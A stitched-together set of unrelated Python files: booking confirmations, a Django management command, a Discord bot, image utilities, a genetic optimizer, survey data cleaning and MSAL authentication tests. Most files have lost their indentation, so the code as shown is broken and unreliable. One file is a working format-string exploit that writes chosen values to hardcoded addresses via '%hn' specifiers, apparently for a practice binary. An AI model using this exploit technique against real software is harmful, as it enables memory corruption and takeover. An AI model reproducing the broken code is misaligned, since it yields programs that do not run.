class ConfirmationCandidate:
"""
A class representing a candidate for confirmation generation.
"""
def __init__(self, petadmin, bk_no):
self.bk_no = bk_no
# a new booking - any subsequent amendments are 'swallowed'
self.new = False
# flag determining whether a payment is acknowledged
self.payment = False
# flag determining whether this is an amendment of an existing booking
self.amended = False
self.booking = petadmin.bookings.get(bk_no)
if self.booking:
self.pet_names = self.booking.pet_names()
# flag determining whether a deposit request is necessary
self.deposit = True
self.deposit_amount = Decimal("0.00")
self.conf_no = 0
self.payment_amount = Decimal("0.00")
self.payment_date = None
self.title = ''
self.forced_subject = ''
self.deluxe = False
self.env = petadmin.env
self.booking_count = 0
self.past_messages = []
self.force_deposit = False
self.in_next_year = False
self.next_years_prices = False
self.deposit_url = ''
self.additional_text = ''
if self.booking:
self.cancelled = self.booking.status == 'C'
self.standby = self.booking.status == 'S'
self.skip = (self.booking.skip == 1)
def add_event(self, aud_type, aud_action, aud_amount, aud_date):
if aud_type == 'P' and aud_action == 'A':
self.payment = True
self.payment_amount = aud_amount
self.payment_date = aud_date
elif aud_type == 'B':
if aud_action == 'A':
self.new = True
self.amended = False
elif aud_type == 'A' and not self.new:
self.amended = True
if aud_action == 'C':
self.cancelled = True
def prepare(self, report_parameters=None):
if not self.booking:
return
if self.booking is None:
raise RuntimeError("Missing booking objects")
if self.booking.deluxe == 1:
self.deluxe = True
if not self.force_deposit:
if self.standby:
log.debug('Standby - no deposit')
self.deposit = False
if self.deposit and self.booking.status == 'V':
log.debug('Booking status confirmed - no deposit')
self.deposit = False
if self.deposit and self.booking.paid_amt != Decimal("0.00"):
log.debug('Booking with prior payments - no deposit')
self.deposit = False
if self.deposit and self.booking.customer.nodeposit:
log.debug('Booking with no-deposit customer - no deposit')
self.deposit = False
if self.deposit and self.payment_amount != Decimal("0.00"):
log.debug('Booking associated with payment event - no deposit')
self.deposit = False
if self.deposit:
if self.deposit_amount == Decimal("0.00"):
self.deposit_amount = Decimal("30.00")
for pet in self.booking.pets:
if pet.spec == 'Dog':
self.deposit_amount = Decimal("50.00")
if self.deposit_amount > self.booking.gross_amt / 2:
self.deposit_amount = \
Decimal(round(self.booking.gross_amt, 1) / 2)
# Round down to nearest 0.05
if not report_parameters:
report_parameters = ReportParameters(self.env)
self.deposit_url = \
report_parameters.get_deposit_url(
self.booking.no, self.deposit_amount,
self.booking.pet_names(), self.booking.customer)
if self.cancelled:
self.title = 'Booking Cancellation'
elif self.standby:
self.title = 'Standby Booking'
else:
if self.deposit:
if self.deluxe:
self.title = 'Provisional Deluxe Booking'
else:
self.title = 'Provisional Booking'
else:
if self.deluxe:
self.title = 'Confirmed Deluxe Booking'
else:
self.title = 'Confirmed Booking'
if self.amended:
self.title += ' - Amended'
self.clean_additional_text = clean_html(self.additional_text)
def confirmation_body(self, report_parameters=None, body_format='html'):
if not self.booking:
return
self.pet_names = self.booking.pet_names()
today_date = date.today()
if not report_parameters:
report_parameters = ReportParameters(self.env)
# report_parameters.read_images()
if body_format == 'html':
mytemplate = Template(filename=report_parameters.report)
else:
mytemplate = Template(filename=report_parameters.report_txt)
self.paid = self.booking.paid_amt != Decimal(0.00)
body = mytemplate.render(
today_date=today_date, conf=self,
logo_code=report_parameters.logo_code,
deposit_icon=report_parameters.deposit_icon,
deluxe_logo_code=report_parameters.deluxe_logo_code,
deposit_url=self.deposit_url
)
return body
def generate_confirmation(self, report_parameters, action):
if not self.booking:
log.error('Missing booking')
return
log.debug(
f'Generating confirmation for booking {self.booking.no}, '
f'action = {action}'
)
if self.skip:
log.warning(f'Skipping booking {self.booking.no}')
return
self.prepare(report_parameters)
log.info(
f'Booking {self.booking.no} titled {self.title}.'
f' Action: {action}')
body = self.confirmation_body(report_parameters)
body_txt = self.confirmation_body(report_parameters, body_format='txt')
now = datetime.now()
timestamp = now.strftime("%Y%m%d%H%M%S")
text_file_name = f"{self.booking.no}_{timestamp}.txt"
fout = path.join(self.env.confirmations_folder, text_file_name)
        with open(fout, 'w') as f:
            f.write(body_txt)
file_name = f"{self.booking.no}_{timestamp}.html"
fout = path.join(self.env.confirmations_folder, file_name)
        with open(fout, 'w') as f:
            f.write(body)
send_email = False
if action == 'email':
send_email = True
if action == 'display' or action == 'review':
webbrowser.open_new_tab(fout)
if action == 'review':
response = input("Email message [Y/N]? ")
send_email = (response.lower()[0] == 'y')
if send_email:
if self.booking.customer.email == '':
log.warning(
f'Customer {self.booking.customer.no} '
f'({self.booking.customer.surname})'
f' has no email address [bk_no={self.booking.no}]'
)
else:
if self.forced_subject:
subject = self.forced_subject
else:
subject = f'{self.title} #{self.booking.no}'
self.env.send_email(
self.booking.customer.email, body,
subject, body_txt
)
try:
if not self.deposit:
self.deposit_amount = 0.0
handle_confirmation(
self.env, self.booking.no, self.deposit_amount,
subject, file_name, self.conf_no,
self.booking.customer.email
)
except Exception as e:
log.exception(str(e))
log.debug('Confirmation complete')
return (file_name, text_file_name)
|
from django.core.management.base import BaseCommand, CommandError
from ncdjango.models import Service, Variable, SERVICE_DATA_ROOT
from django.db import transaction
import os
import os.path
class Command(BaseCommand):
help = 'Delete an ncdjango service'
def add_arguments(self, parser):
parser.add_argument('service_name')
def handle(self, *args, **options):
name = options['service_name']
with transaction.atomic():
svc = Service.objects.get(name=name)
Variable.objects.filter(service_id=svc.id).delete()
path = svc.data_path
svc.delete()
os.remove(os.path.join(SERVICE_DATA_ROOT, path))
|
import os
from shutil import copyfile
import socket
from setuptools import setup, find_packages, Command
from distutils.command.install import install
from distutils.command.sdist import sdist
here = os.path.dirname(os.path.abspath(__file__))
class InstallCommand(install):
user_options = install.user_options
def initialize_options(self):
install.initialize_options(self)
def finalize_options(self):
install.finalize_options(self)
def run(self):
install.run(self)
setup(
name="sqlalchemy-gpudb",
version="7.0.1",
author="Andrew Duberstein",
author_email="ksutton@kinetica.com",
description="Kinetica dialect for SQLAlchemy",
license="MIT",
classifiers=[
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
keywords="SQLAlchemy GPUDb",
cmdclass={
"install": InstallCommand,
"sdist": sdist,
},
extras_require={
"dev": [
"pytest",
"black",
]
},
packages=find_packages(include=["sa_gpudb"]),
include_package_data=True,
install_requires=["SQLAlchemy", "pyodbc"],
)
|
# Generated by Django 3.0.3 on 2020-08-06 15:50
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0063_auto_20200804_1403'),
]
operations = [
migrations.AlterModelTable(
name='salessubmissioncontent',
table='sales_submission_content',
),
]
|
import discord
from discord.ext import commands
import os
from dotenv import load_dotenv
import json
import sys, traceback
#configs
load_dotenv("./config/.env")
TOKEN = os.getenv("token")
PREFIX = os.getenv("prefix")
bot = commands.Bot(command_prefix=f'{PREFIX}')
bot.remove_command('help')
@bot.event
async def on_ready():
await bot.change_presence(
status=discord.Status.idle,
activity=discord.Activity(type=discord.ActivityType.watching, name=f"{PREFIX}help")
)
print("Bot online!")
with open ('extension/module.json', 'r') as data:
cog_data = json.load(data)
extension = cog_data['imports']
if __name__ == "__main__":
for modules in extension:
try:
bot.load_extension(modules)
print(f"[/] loaded | {modules}")
        except Exception:
print(f'Error loading {modules}', file=sys.stderr)
traceback.print_exc()
bot.run(f"{TOKEN}")
|
#Exploit code by RegaledSeer
import sys
ADDRESS = "\xf4\x96\x04\x08"
SECOND_ADDRESS = "\xf6\x96\x04\x08"
DUMMY_STRING = "AAAA"
DUMMY_STRING_TWO = "BBBB"
FIRST_WRITE = 0x5544
SECOND_WRITE = 0x10102
def find_exploit():
payload = ""
payload += DUMMY_STRING
payload += DUMMY_STRING_TWO
payload += "%12$p"
payload += "%13$p"
return payload
def craft_exploit():
payload = ""
payload += ADDRESS
payload += SECOND_ADDRESS
payload += "%{0}x".format(FIRST_WRITE - (len(ADDRESS) + len(SECOND_ADDRESS)))
payload += "%12$hn"
payload += "%{0}x".format(SECOND_WRITE - FIRST_WRITE)
payload += "%13$hn"
return payload
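# Hedged sketch of the arithmetic above (assuming a 32-bit little-endian
# target where stack offsets 12 and 13 point at ADDRESS and SECOND_ADDRESS,
# as probed by find_exploit): the two addresses contribute 8 bytes of output,
# the first "%Nx" pads printf's running character count up to FIRST_WRITE
# (0x5544) before "%12$hn" stores that count's low half-word at ADDRESS, and
# the second pad raises the count to SECOND_WRITE (0x10102) so "%13$hn"
# stores 0x0102 at SECOND_ADDRESS.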
def main():
sys.stdout.write(craft_exploit())
if __name__ == "__main__":
main()
|
"""
Some functionality related to dataset
Copyright (C) 2016-2018 Jiri Borovec <jiri.borovec@fel.cvut.cz>
"""
import os
import logging
import numpy as np
import cv2 as cv
import matplotlib.pyplot as plt
from skimage.filters import threshold_otsu
from skimage.exposure import rescale_intensity
TISSUE_CONTENT = 0.01
def detect_binary_blocks(vec_bin):
""" detect the binary object by beginning, end and length in !d signal
:param [bool] vec_bin: binary vector with 1 for an object
:return [int], [int], [int]:
>>> vec = np.array([1] * 15 + [0] * 5 + [1] * 20)
>>> detect_binary_blocks(vec)
([0, 20], [15, 39], [14, 19])
"""
begins, ends, lengths = [], [], []
# in case that it starts with an object
if vec_bin[0]:
begins.append(0)
length = 0
# iterate over whole array, skip the first one
for i in range(1, len(vec_bin)):
if vec_bin[i] > vec_bin[i - 1]:
begins.append(i)
elif vec_bin[i] < vec_bin[i - 1]:
ends.append(i)
lengths.append(length)
length = 0
elif vec_bin[i] == 1:
length += 1
# in case that it ends with an object
if vec_bin[-1]:
ends.append(len(vec_bin) - 1)
lengths.append(length)
return begins, ends, lengths
def find_split_objects(hist, nb_objects=2, threshold=TISSUE_CONTENT):
""" find the N largest objects and set split as middle distance among them
:param [float] hist: input vector
:param int nb_objects: number of desired objects
:param float threshold: threshold for input vector
:return [int]:
>>> vec = np.array([1] * 15 + [0] * 5 + [1] * 20)
>>> find_split_objects(vec)
[17]
"""
hist_bin = hist > threshold
begins, ends, lengths = detect_binary_blocks(hist_bin)
if len(lengths) < nb_objects:
logging.error('not enough objects')
return []
# select only the number of largest objects
obj_sorted = sorted(zip(lengths, range(len(lengths))), reverse=True)
obj_select = sorted([o[1] for o in obj_sorted][:nb_objects])
    # compute the mean position in the gap
splits = [np.mean((ends[obj_select[i]], begins[obj_select[i + 1]]))
for i in range(len(obj_select) - 1)]
splits = list(map(int, splits))
return splits
def find_largest_object(hist, threshold=TISSUE_CONTENT):
""" find the largest objects and give its beginning end end
:param [float] hist: input vector
:param float threshold: threshold for input vector
:return [int]:
>>> vec = np.array([1] * 15 + [0] * 5 + [1] * 20)
>>> find_largest_object(vec)
(20, 39)
"""
hist_bin = hist > threshold
begins, ends, lengths = detect_binary_blocks(hist_bin)
assert len(lengths) > 0, 'no object found'
# select only the number of largest objects
obj_sorted = sorted(zip(lengths, range(len(lengths))), reverse=True)
obj_select = obj_sorted[0][1]
return begins[obj_select], ends[obj_select]
def project_object_edge(img, dimension):
""" scale the image, binarise with Othu and project to one dimension
:param ndarray img:
:param int dimension: select dimension for projection
:return [float]:
>>> img = np.zeros((20, 10, 3))
>>> img[2:6, 1:7, :] = 1
>>> img[10:17, 4:6, :] = 1
>>> project_object_edge(img, 0).tolist() # doctest: +NORMALIZE_WHITESPACE
[0.0, 0.0, 0.7, 0.7, 0.7, 0.7, 0.0, 0.0, 0.0, 0.0,
0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.0, 0.0, 0.0]
"""
assert dimension in (0, 1), 'not supported dimension %i' % dimension
assert img.ndim == 3, 'unsupported image shape %s' % repr(img.shape)
img_gray = np.mean(img, axis=-1)
img_gray = cv.GaussianBlur(img_gray, (5, 5), 0)
p_low, p_high = np.percentile(img_gray, (1, 95))
img_gray = rescale_intensity(img_gray, in_range=(p_low, p_high))
img_bin = img_gray > threshold_otsu(img_gray)
img_edge = np.mean(img_bin, axis=1 - dimension)
return img_edge
def load_large_image(img_path):
""" loading very large images
    Note, for the loading we have to use matplotlib because neither ImageMagick
    nor other libs (opencv, skimage, Pillow) are able to load images larger than 64k or 32k.
:param str img_path: path to the image
:return ndarray: image
"""
assert os.path.isfile(img_path), 'missing image: %s' % img_path
img = plt.imread(img_path)
if img.ndim == 3 and img.shape[2] == 4:
img = cv.cvtColor(img, cv.COLOR_RGBA2RGB)
return img
def save_large_image(img_path, img):
""" saving large images more then 50k x 50k
Note, for the saving we have to use openCV while other
lib (matplotlib, Pillow, ITK) is not able to save larger images then 32k.
:param str img_path: path to the new image
:param ndarray img: image
>>> img = np.random.random((2500, 3200, 3))
>>> img_path = './sample-image.jpg'
>>> save_large_image(img_path, img)
>>> img2 = load_large_image(img_path)
>>> img.shape == img2.shape
True
>>> os.remove(img_path)
"""
if img.ndim == 3 and img.shape[2] == 4:
img = cv.cvtColor(img, cv.COLOR_RGBA2RGB)
    # for some reason, with linear interpolation some values overflow the (0, 1) range
if np.max(img) <= 1.5:
img = (img * 255)
elif np.max(img) > 255:
img = (img / 255.)
if img.dtype != np.uint8:
img = np.clip(img, a_min=0, a_max=255).astype(np.uint8)
if os.path.isfile(img_path):
logging.debug('image will be overwritten: %s', img_path)
cv.imwrite(img_path, img)
|
# -*- coding: utf-8 -*-
import yaml
import os
import numpy as np
import pprint
from core.utils import decode_name
def _decode_yaml_tuple(tuple_str):
return np.array(list(map(lambda x: list(map(int, str.split(x, ','))), tuple_str.split())))
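# Hedged sketch (illustrative input only, not part of the original module):
# _decode_yaml_tuple turns the whitespace/comma-separated strings used for
# fields such as 'mask' and 'anchors' into a 2-D integer numpy array.
def _decode_yaml_tuple_example():
    arr = _decode_yaml_tuple('10,13 16,30 33,23')
    assert arr.shape == (3, 2) and arr[1, 1] == 30
    return arr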
def decode_cfg(path):
print('Loading config from', path)
if not os.path.exists(path):
raise KeyError('%s does not exist ... ' % path)
with open(path, 'r') as f:
cfg = yaml.safe_load(f.read())
# some fields need to be decoded
cfg['yolo']['strides'] = list(map(int, cfg['yolo']['strides'].split(',')))
cfg['yolo']['mask'] = _decode_yaml_tuple(cfg['yolo']['mask'])
cfg['yolo']['anchors'] = _decode_yaml_tuple(cfg['yolo']['anchors'])
cfg['yolo']['names'] = decode_name(cfg['yolo']['name_path'])
cfg['yolo']['num_classes'] = len(cfg['yolo']['names'])
cfg['train']['image_size'] = list(map(int, cfg['train']['image_size'].split(',')))
cfg['test']['image_size'] = list(map(int, cfg['test']['image_size'].split(',')))
pprint.pprint(cfg)
return cfg
|
from unittest.mock import patch
import pytest
import harvey.app as app
@pytest.mark.parametrize(
'route',
[
'health',
'pipelines',
# 'pipelines/<pipeline_id>', # TODO: Figure out how to test endpoints with parameters
],
)
def test_routes_are_reachable_get(mock_client, route):
response = mock_client.get(route)
assert response.status_code == 200
def test_routes_not_found(mock_client):
response = mock_client.get('bad_route')
assert response.status_code == 404
@patch('harvey.webhooks.Webhook.parse_webhook')
def test_start_pipeline(mock_parse_webhook):
# TODO: Long-term, test the status_code and logic
app.start_pipeline()
mock_parse_webhook.assert_called_once()
|
import scrapy
from oslusiadasextract.utils import Utils
from oslusiadasextract.dbconnections.mongo_connection import MongoConnection
utils = Utils()
mongo_connection = MongoConnection()
class SpiderlusiadasSpider(scrapy.Spider):
name = 'spiderlusiadas'
start_urls = utils.generate_chants_links()
def parse(self, response):
array_with_text = response.xpath('//div[@class="uk-panel uk-panel-box estrofe"]/descendant::text()').extract()
current_url = response.request.url
chant_info = utils.parse_chant_url(current_url)
chant_text = ' '.join(utils.parse_scrapy_response(array_with_text)).strip()
print(chant_info['chant_number'])
print(chant_info['stranza'])
print(chant_text)
mongo_connection.insert_chant({"chant_number": chant_info['chant_number'],
"stranza": chant_info['stranza'],
"text": chant_text})
|
from bs4 import BeautifulSoup
import requests
from PIL import Image
from io import BytesIO
import os
def Start():
search=input("Search :")
params={"q":search}
dir_name=search.replace(" ","_").lower()
if not os.path.isdir(dir_name):
os.makedirs(dir_name)
r=requests.get("https://www.bing.com/images/search",params=params)
soup=BeautifulSoup(r.text,"html.parser")
links=soup.findAll("a",{"class":"thumb"})
for item in links:
img_obj=requests.get(item.attrs["href"])
print("Downloading",item.attrs["href"])
title=item.attrs["href"].split("/")[-1]
try:
img=Image.open(BytesIO(img_obj.content))
img.save("./"+dir_name+"/"+title,img.format)
        except Exception:
print("Cannot save this file format")
Start()
Start()
|
# pylint: skip-file
import ast
import inspect
import pathlib
import asttokens
# import black
def ForeignKey(
to,
on_delete,
related_name=None,
related_query_name=None,
limit_choices_to=None,
parent_link=False,
to_field=None,
db_constraint=True,
**kwargs,
):
pass
sig = inspect.signature(ForeignKey)
def walk(parent):
for path in parent.iterdir():
if path.is_dir():
yield from walk(path)
elif path.suffix == ".py":
yield path
def get_replacements(tree):
visitor = Visitor(tree)
visitor.visit(tree.tree)
return visitor.replacements
def replace(src, replacements):
chunks = []
end = len(src)
for (start, stop), mod in reversed(replacements):
chunks.append(src[stop:end])
chunks.append(mod)
end = start
chunks.append(src[0:end])
return "".join(reversed(chunks))
class Visitor(ast.NodeVisitor):
def __init__(self, tree):
self.tree = tree
self.replacements = []
def visit_Call(self, node):
self.generic_visit(node)
if not isinstance(node.func, ast.Attribute):
return
if node.func.attr not in ("ForeignKey", "OneToOneField"):
return
args = node.args
kwargs = {k.arg: k.value for k in node.keywords}
bound_args = sig.bind_partial(*args, **kwargs)
if "on_delete" in bound_args.arguments:
return
src = (
self.tree.get_text(node)[:-1].rstrip().rstrip(",")
+ ", on_delete=models.CASCADE)"
)
self.replacements.append((self.tree.get_text_range(node), src))
for path in walk(pathlib.Path(".")):
src = path.read_text()
try:
tree = asttokens.ASTTokens(src, filename=path, parse=True)
except SyntaxError:
print(f"Cannot parse {path}")
continue
replacements = get_replacements(tree)
if not replacements:
continue
print(f"Modifying {len(replacements)} calls in {path}")
src = replace(src, replacements)
# src = black.format_str(src, line_length=79)
path.write_text(src)
|
from warnings import warn
import pandas as pd
import matplotlib.lines as mlines
from ..utils import make_iterable, SIZE_FACTOR, order_as_mapping_data
from ..exceptions import PlotnineWarning
from ..doctools import document
from ..aes import aes
from .geom import geom
from .geom_segment import geom_segment
@document
class geom_vline(geom):
"""
Vertical line
{usage}
Parameters
----------
{common_parameters}
"""
DEFAULT_AES = {'color': 'black', 'linetype': 'solid',
'size': 0.5, 'alpha': 1}
REQUIRED_AES = {'xintercept'}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity',
'na_rm': False, 'inherit_aes': False}
def __init__(self, mapping=None, data=None, **kwargs):
mapping, data = order_as_mapping_data(mapping, data)
xintercept = kwargs.pop('xintercept', None)
if xintercept is not None:
if mapping:
warn("The 'xintercept' parameter has overridden "
"the aes() mapping.", PlotnineWarning)
data = pd.DataFrame({'xintercept': make_iterable(xintercept)})
mapping = aes(xintercept='xintercept')
kwargs['show_legend'] = False
geom.__init__(self, mapping, data, **kwargs)
def draw_panel(self, data, panel_params, coord, ax, **params):
"""
Plot all groups
"""
ranges = coord.backtransform_range(panel_params)
data['x'] = data['xintercept']
data['xend'] = data['xintercept']
data['y'] = ranges.y[0]
data['yend'] = ranges.y[1]
data = data.drop_duplicates()
for _, gdata in data.groupby('group'):
gdata.reset_index(inplace=True)
geom_segment.draw_group(gdata, panel_params,
coord, ax, **params)
@staticmethod
def draw_legend(data, da, lyr):
"""
Draw a vertical line in the box
Parameters
----------
data : dataframe
da : DrawingArea
lyr : layer
Returns
-------
out : DrawingArea
"""
x = [0.5 * da.width] * 2
y = [0, da.height]
data['size'] *= SIZE_FACTOR
key = mlines.Line2D(x,
y,
alpha=data['alpha'],
linestyle=data['linetype'],
linewidth=data['size'],
color=data['color'],
solid_capstyle='butt',
antialiased=False)
da.add_artist(key)
return da
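# Hedged usage sketch (comments only, illustrative and not part of the
# original module): geom_vline is normally added to a ggplot object with
# either a fixed xintercept or an aes() mapping, for example:
#
#     from plotnine import ggplot, aes, geom_point, geom_vline
#     from plotnine.data import mtcars
#     p = (ggplot(mtcars, aes('wt', 'mpg'))
#          + geom_point()
#          + geom_vline(xintercept=3.5, color='red', linetype='dashed'))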
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""Msticpy MSAL authentication test class."""
from unittest.mock import patch
from msticpy.common.msal_auth import MSALDelegatedAuth
class MSALAppMock:
"""Mock the MSAL PublicClientApplicaiton for tests"""
def __init__(self):
self.authed = False
def get_accounts(self, **kwargs):
if kwargs["username"] and kwargs["username"] == "test@test.com" or self.authed:
return ["test@test.com"]
else:
return None
def acquire_token_silent_with_error(self, **kwargs):
self.authed = True
return {
"access_token": "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
}
def acquire_token_interactive(self, **kwargs):
self.authed = True
return {
"access_token": "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
}
def acquire_token_by_device_flow(self, flow, **kwargs):
self.authed = True
return {
"access_token": "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
}
def initiate_device_flow(self, **kwargs):
return {"message": "Your Device Code is ABCDEF", "user_code": "ABCDEF"}
@patch("msal.PublicClientApplication")
def test_msal_auth_device(msal_mock):
"""Test MSAL auth with a Device Code."""
msal_mock.return_value = MSALAppMock()
auth = MSALDelegatedAuth(
client_id="461d2b50-8c8a-4ac4-b78c-6110144d93ce",
authority="https://login.microsoftonline.com",
username="test@test.com",
scopes=["User.Read"],
auth_type="device",
)
auth.get_token()
assert auth.token == "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
@patch("msal.PublicClientApplication")
def test_msal_auth(msal_mock):
"""Test MSAL auth with Interactive Authentication."""
msal_mock.return_value = MSALAppMock()
auth = MSALDelegatedAuth(
client_id="461d2b50-8c8a-4ac4-b78c-6110144d93ce",
authority="https://login.microsoftonline.com",
username="test@test.com",
scopes=["User.Read"],
)
auth.get_token()
assert auth.token == "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
@patch("msal.PublicClientApplication")
def test_msal_auth_unknown_user(msal_mock):
    """Test MSAL auth with Interactive Authentication with an unknown user."""
msal_mock.return_value = MSALAppMock()
auth = MSALDelegatedAuth(
client_id="461d2b50-8c8a-4ac4-b78c-6110144d93ce",
authority="https://login.microsoftonline.com",
username="test@test2.com",
scopes=["User.Read"],
)
auth.get_token()
assert auth.token == "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
|
# Databricks notebook source
# COMMAND ----------
stats_df = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet")
# COMMAND ----------
downloaded_df = spark.read.parquet("/mnt/group07/final_data_product/classification_result/downloaded.parquet")
# COMMAND ----------
downloaded_df.distinct().count()
# COMMAND ----------
# Collect the relevant data
df_width_height = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet")
df_resolutions = df_width_height.where(df_width_height.img_width.isNotNull()).where(df_width_height.img_height.isNotNull())
df_resolutions.count()
# COMMAND ----------
downloaded_df.count()
# COMMAND ----------
downloaded_df.groupBy("error_code").count().show()
# COMMAND ----------
df = df_resolutions.join(downloaded_df.select(downloaded_df.image_id.alias("id")), "id", "leftanti")
# COMMAND ----------
df.show()
# COMMAND ----------
labels_df = spark.read.parquet("/mnt/group07/final_data_product/classification_result/labels.parquet")
# COMMAND ----------
labels_df.select("image_id").distinct().count()
# COMMAND ----------
# Get Total Amount Of Bytes Downloaded / S3 Access
stats_df.select("img_size").groupBy().sum().show()
# COMMAND ----------
import pyspark.sql.functions as pf
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Collect the relevant data
df_width_height = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet")
df_resolutions = df_width_height.where(df_width_height.img_width.isNotNull()).where(df_width_height.img_height.isNotNull())
df_resolutions.join(df, "id", "left_anti").select("img_size", "img_width", "img_height").describe().show()
# COMMAND ----------
import numpy as np
import matplotlib.pyplot as plt
def autolabel(rects):
"""
Attach a text label above each bar displaying its height
"""
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2., 1.01*height,
'%d' % int(height),
ha='center', va='bottom')
plt.close("all")
count_list = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet").select("error_code").groupBy("error_code").count().collect()
labels, values = zip(*count_list)
fig, ax = plt.subplots(figsize=(7,6))
xs = np.arange(len(labels))
width = 1
labels = ["Invalid\nImage" if val == "image file is truncated (32 bytes not processed)" else "HTTP\n{0}".format(val) if val != "s3" else "S3\nGET" for val in labels]
rects = plt.bar(xs, values, width, align='center')
plt.xticks(xs, labels, rotation='vertical')
plt.yticks(values)
plt.ylabel("Number Of Requests")
autolabel(rects)
display(fig)
fig.savefig("/dbfs/mnt/group07/plots/initial_downloads.pdf")
# COMMAND ----------
|
import random, sys, time
import numpy as np
from .tournament import TeamTournament
class Optimizer(object):
"""docstring for Optimizer"""
#Population stats
pop_size = 60
runs = 1
elitism = True
#The mutation rate, in percent
mutation_rate = 3
def __init__(self):
super(Optimizer, self).__init__()
def mutate_population(self, population):
"""
        A mutation function that mutates the individuals.
"""
for individual in population:
for position,trait in enumerate(individual):
if random.randint(0,100) < self.mutation_rate:
individual[position] += np.random.normal()
def reproduce(self, scores, population, elitism=False):
"""
Reproduces a population
"""
if elitism:
scores[np.argmax(scores)] *= 2
#Clip the scores to 0
np.clip(scores, 0, sys.maxint, scores)
#print(np.average(scores))
#print(scores)
#Normalize scores
total_score = sum(scores)
scores /= total_score
choices = np.random.choice(
range(population.shape[0]),
(len(population), 2),
p=scores
)
new_pop = np.zeros(population.shape)
for index, parents in enumerate(choices):
new_pop[index, :] = self.cross_over(map(lambda x:population[x], parents))
return new_pop
def cross_over(self, parents):
"""
Crosses over parents to produce a child
"""
        assert len(parents[0]) == len(parents[1])
num_traits = len(parents[0])
index = random.randint(int(num_traits/5),int(4*num_traits/5))
child = np.zeros(parents[0].shape)
child[:index] = (parents[0])[:index]
child[index:] = (parents[1])[index:]
return child
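    def _cross_over_example(self):
        # Hedged sketch with invented trait vectors (not part of the original
        # class): the child keeps the first 'index' traits from parents[0] and
        # the remainder from parents[1], where 'index' is drawn from the middle
        # three fifths of the genome in cross_over above.
        parents = [np.arange(10, dtype=float), np.arange(10, 20, dtype=float)]
        child = self.cross_over(parents)
        assert len(child) == len(parents[0])
        return child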
def run(self, players, teams, pop_size, gen_max, **kwargs):
assert(len(players) > 0)
assert(len(players) == teams[0] * teams[1])
num_features = players[0].param_dim()
#Create the tournament object
tourney = TeamTournament(teams)
# Create the populations
populations = np.zeros((teams[0], pop_size, num_features))
for t in range(teams[0]):
for p in range(teams[1]):
populations[t,p,:] = players[t*teams[1] + p].get_params()
for run in range(self.runs):
#get the start time
start_time = time.time()
for gen_count in range(gen_max):
scores = tourney.play_tournament(populations, players)
print("\nGen: {}".format(gen_count))
for team, population in enumerate(populations):
new_population = self.reproduce(scores[team,:], population)
self.mutate_population(new_population)
populations[team,:,:] = new_population
|
# -*- coding: utf-8 -*-
import csv, json
import os
import traceback
import settings
import tools
diverse_matcher = {
"Very Diverse": 3, "Moderately Diverse": 2,
"Slightly Diverse": 1, "Not Diverse": 0
}
importance_matcher = {
"Very Important": 3,
"Moderately Important": 2,
"Slightly Important": 1,
"Slightly Unimportant": -1, #contains special ascii character
"Moderately Unimportant": -2,
"Very Unimporant": -3
}
agreement_matcher = {
"Strongly Agree": 3,
"Moderately Agree": 2,
"Slightly Agree": 1,
"Slightly Disagree": -1,
"Moderately Disagree": -2,
"Strongly Disagree": -3
}
def clean_fac_staff_data(fac_staff_data):
fac_staff_clean_key = []
fac_staff_clean_data = []
# strip initial entry that is the question each answer coorelates to
for i in xrange(1, len(fac_staff_data)):
try:
print('.'),
raw_entry = fac_staff_data[i]
clean_entry = []
# ignore timestamp
# position
position_matcher = {"Staff": "staff",
"Non-Tenured Faculty": "nontenured faculty",
"Tenured Faculty": "tenured faculty"}
position = position_matcher[raw_entry[1]]
clean_entry.append(('position', raw_entry[1], position))
# race
race_matcher = {"African American / Black": "black",
"Asian": "asian", "Hispanic / Latino / Latina": "hispanic",
"Non-Hispanic White": "white",
"Pacific Islander / Hawaiian" : "hawaiian", "Not Listed": "not listed"
}
race = race_matcher[raw_entry[2]]
clean_entry.append(('race', raw_entry[2], race))
# bio gender
bio_gender_matcher = {"Female": "female", "Male": "male"}
bio_gender = bio_gender_matcher[raw_entry[3]]
clean_entry.append(('bio_gender', raw_entry[3], bio_gender))
# id gender
id_gender_matcher = {"Man": "male", "Woman": "female",
"Intersexual": "intersexual", "Transgender": "transgender",
"Not Listed": "not listed"}
id_gender = id_gender_matcher[raw_entry[4]]
clean_entry.append(('id_gender', raw_entry[4], id_gender))
# sexuality
sexuality_matcher = {"Asexual": "asexual", "Bisexual": "bisexual",
"Gay": "gay", "Heterosexual": "heterosexual", "Lesbian": "lesbian",
"Questioning": "questioning", "Not Listed": "not listed"
}
sexuality = sexuality_matcher[raw_entry[5]]
clean_entry.append(('sexuality', raw_entry[5], sexuality))
# years at E&H
years_working_matcher = {"1st year": 1, "2-5": 3.5, "6-10": 8,
"11-19": 15, "20+": 25
}
years_working = years_working_matcher[raw_entry[6]]
clean_entry.append(('years_working', raw_entry[6], years_working))
# division
division_matcher = {"Humanities": "humanities",
"Life Sciences": "life sciences",
"Social Sciences": "social sciences", "": None
}
